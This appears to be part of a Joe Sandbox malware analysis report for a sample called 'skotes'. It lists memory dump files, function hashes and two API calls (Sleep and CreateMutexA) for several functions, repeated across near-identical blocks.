Associated: 00000002.00000002.2131446330.00000000012BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131463521.00000000012C1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131482625.00000000012D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131500783.00000000012D1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 1ff9f36af1d80247c80a08ca369fee6bfcb1f52d47c1e8301a3a542b7685a942
Instruction ID: e7769113fef97999006a03c9491b59e065ede077cdccfa39459376ab040eea10
Opcode Fuzzy Hash: 1ff9f36af1d80247c80a08ca369fee6bfcb1f52d47c1e8301a3a542b7685a942
Instruction Fuzzy Hash: 3F316C71A081059BEB089B79DD85BEDBB62EFC1320F208219E114A72D5C7B95980EB51

Function 00FB9F44 Relevance: 3.1, APIs: 2, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00FBA963
CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981

Memory Dump Source

Source File: 00000002.00000002.2129775105.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000002.00000002.2129751050.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2129775105.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130310934.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130333140.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130355615.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130377442.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130404260.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130539606.000000000117C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130562836.000000000117E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130592348.0000000001196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130592348.00000000011A4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130636306.00000000011A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130654760.00000000011AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130673771.00000000011AB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130737289.00000000011AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130762098.00000000011B8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130787175.00000000011BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130823389.00000000011CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130840774.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130864322.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130895390.00000000011E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130924370.0000000001201000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130947293.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130972857.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130998115.000000000120D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131016737.000000000120E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131036067.0000000001214000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131054531.000000000121D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131069617.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131083882.000000000121F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131098490.0000000001221000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131114327.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131129643.000000000122E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131144841.000000000122F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131161563.0000000001233000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131177987.0000000001234000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131193689.000000000123A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131210563.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131225546.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131252191.0000000001246000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131297846.000000000124F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131339315.0000000001268000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131359944.0000000001269000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131359944.000000000128C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131412184.00000000012B9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131429177.00000000012BA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131446330.00000000012BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131463521.00000000012C1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131482625.00000000012D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131500783.00000000012D1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: ca9bcf76af26f7abc6f8e5222d9bdcb1f70fee94c38d9ac87876bc90d750ee68
Instruction ID: ee2127fbf6b6d82652e0344aa88b7a0312b0d859fb88a58229a2c1aaeead5bab
Opcode Fuzzy Hash: ca9bcf76af26f7abc6f8e5222d9bdcb1f70fee94c38d9ac87876bc90d750ee68
Instruction Fuzzy Hash: AA317D317042049BFB18AB79CD857EDBB62EF85320F20421DE414EB2D5C77A9980EB52

Function 00FBA079 Relevance: 3.1, APIs: 2, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00FBA963
CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981

Memory Dump Source

Source File: 00000002.00000002.2129775105.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000002.00000002.2129751050.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2129775105.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130310934.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130333140.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130355615.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130377442.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130404260.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130539606.000000000117C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130562836.000000000117E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130592348.0000000001196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130592348.00000000011A4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130636306.00000000011A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130654760.00000000011AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130673771.00000000011AB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130737289.00000000011AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130762098.00000000011B8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130787175.00000000011BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130823389.00000000011CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130840774.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130864322.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130895390.00000000011E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130924370.0000000001201000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130947293.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130972857.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130998115.000000000120D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131016737.000000000120E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131036067.0000000001214000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131054531.000000000121D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131069617.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131083882.000000000121F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131098490.0000000001221000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131114327.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131129643.000000000122E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131144841.000000000122F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131161563.0000000001233000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131177987.0000000001234000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131193689.000000000123A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131210563.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131225546.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131252191.0000000001246000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131297846.000000000124F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131339315.0000000001268000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131359944.0000000001269000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131359944.000000000128C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131412184.00000000012B9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131429177.00000000012BA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131446330.00000000012BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131463521.00000000012C1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131482625.00000000012D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131500783.00000000012D1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 5a34630fa79db962a1293f0dfb53ae84acb98928da4dc29e5c91e090add441e6
Instruction ID: cb406a306be7297b4e9540a65f0b6900b1a3c34d86ac9288bd9c79ff0f452412
Opcode Fuzzy Hash: 5a34630fa79db962a1293f0dfb53ae84acb98928da4dc29e5c91e090add441e6
Instruction Fuzzy Hash: DA314631B041009BFB18EB7DCD85BEDBB62EF81320F204219E414AB6D5C77A9980EF12

Function 00FBA1AE Relevance: 3.1, APIs: 2, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00FBA963
CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981

Memory Dump Source

Source File: 00000002.00000002.2129775105.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000002.00000002.2129751050.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2129775105.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130310934.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130333140.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130355615.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130377442.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130404260.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130539606.000000000117C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130562836.000000000117E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130592348.0000000001196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130592348.00000000011A4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130636306.00000000011A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130654760.00000000011AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130673771.00000000011AB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130737289.00000000011AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130762098.00000000011B8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130787175.00000000011BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130823389.00000000011CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130840774.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130864322.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130895390.00000000011E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130924370.0000000001201000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130947293.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130972857.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130998115.000000000120D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131016737.000000000120E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131036067.0000000001214000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131054531.000000000121D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131069617.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131083882.000000000121F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131098490.0000000001221000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131114327.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131129643.000000000122E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131144841.000000000122F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131161563.0000000001233000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131177987.0000000001234000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131193689.000000000123A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131210563.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131225546.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131252191.0000000001246000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131297846.000000000124F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131339315.0000000001268000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131359944.0000000001269000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131359944.000000000128C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131412184.00000000012B9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131429177.00000000012BA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131446330.00000000012BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131463521.00000000012C1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131482625.00000000012D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131500783.00000000012D1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: dcf31de143913f3ad3a769584a0dbd847f8f9bf3bacbf3e61b79bd4bd222f99e
Instruction ID: 0a97fda4380a10d29448eb88f43a81e0f18396e2ab1718ced82a9bd3a129d634
Opcode Fuzzy Hash: dcf31de143913f3ad3a769584a0dbd847f8f9bf3bacbf3e61b79bd4bd222f99e
Instruction Fuzzy Hash: 01316A31B041009BFB089B7DDD89BDDB762EF85320F204219E004AB6D5D77A9980AF12

Function 00FBA418 Relevance: 3.1, APIs: 2, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00FBA963
CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981

Memory Dump Source

Source File: 00000002.00000002.2129775105.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000002.00000002.2129751050.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2129775105.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130310934.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130333140.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130355615.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130377442.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130404260.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130539606.000000000117C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130562836.000000000117E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130592348.0000000001196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130592348.00000000011A4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130636306.00000000011A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130654760.00000000011AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130673771.00000000011AB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130737289.00000000011AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130762098.00000000011B8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130787175.00000000011BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130823389.00000000011CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130840774.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130864322.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130895390.00000000011E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130924370.0000000001201000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130947293.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130972857.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130998115.000000000120D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131016737.000000000120E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131036067.0000000001214000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131054531.000000000121D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131069617.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131083882.000000000121F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131098490.0000000001221000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131114327.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131129643.000000000122E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131144841.000000000122F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131161563.0000000001233000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131177987.0000000001234000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131193689.000000000123A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131210563.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131225546.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131252191.0000000001246000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131297846.000000000124F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131339315.0000000001268000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131359944.0000000001269000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131359944.000000000128C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131412184.00000000012B9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131429177.00000000012BA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131446330.00000000012BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131463521.00000000012C1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131482625.00000000012D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131500783.00000000012D1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 0d1a59c2e8c66cf90cba7a6f622610f1ea3b4b576604fa6956d30b588f9cba34
Instruction ID: 94770f19d94d09b820dc3a8e279287f415ca166c5d1e26066b85a6caed2fb9b0
Opcode Fuzzy Hash: 0d1a59c2e8c66cf90cba7a6f622610f1ea3b4b576604fa6956d30b588f9cba34
Instruction Fuzzy Hash: B7318C31B04144DBEB18EB7DCDC9BEDB761EF81324F204218E014EB2E5D77A5980AB52

Function 00FBA54D Relevance: 3.1, APIs: 2, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00FBA963
CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981

Memory Dump Source

Source File: 00000002.00000002.2129775105.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000002.00000002.2129751050.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2129775105.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130310934.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130333140.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130355615.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130377442.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130404260.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130539606.000000000117C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130562836.000000000117E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130592348.0000000001196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130592348.00000000011A4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130636306.00000000011A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130654760.00000000011AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130673771.00000000011AB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130737289.00000000011AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130762098.00000000011B8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130787175.00000000011BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130823389.00000000011CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130840774.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130864322.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130895390.00000000011E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130924370.0000000001201000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130947293.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130972857.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130998115.000000000120D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131016737.000000000120E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131036067.0000000001214000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131054531.000000000121D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131069617.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131083882.000000000121F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131098490.0000000001221000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131114327.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131129643.000000000122E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131144841.000000000122F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131161563.0000000001233000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131177987.0000000001234000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131193689.000000000123A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131210563.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131225546.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131252191.0000000001246000.00000080.00000001.01000000.00000007.sdmpDownload File
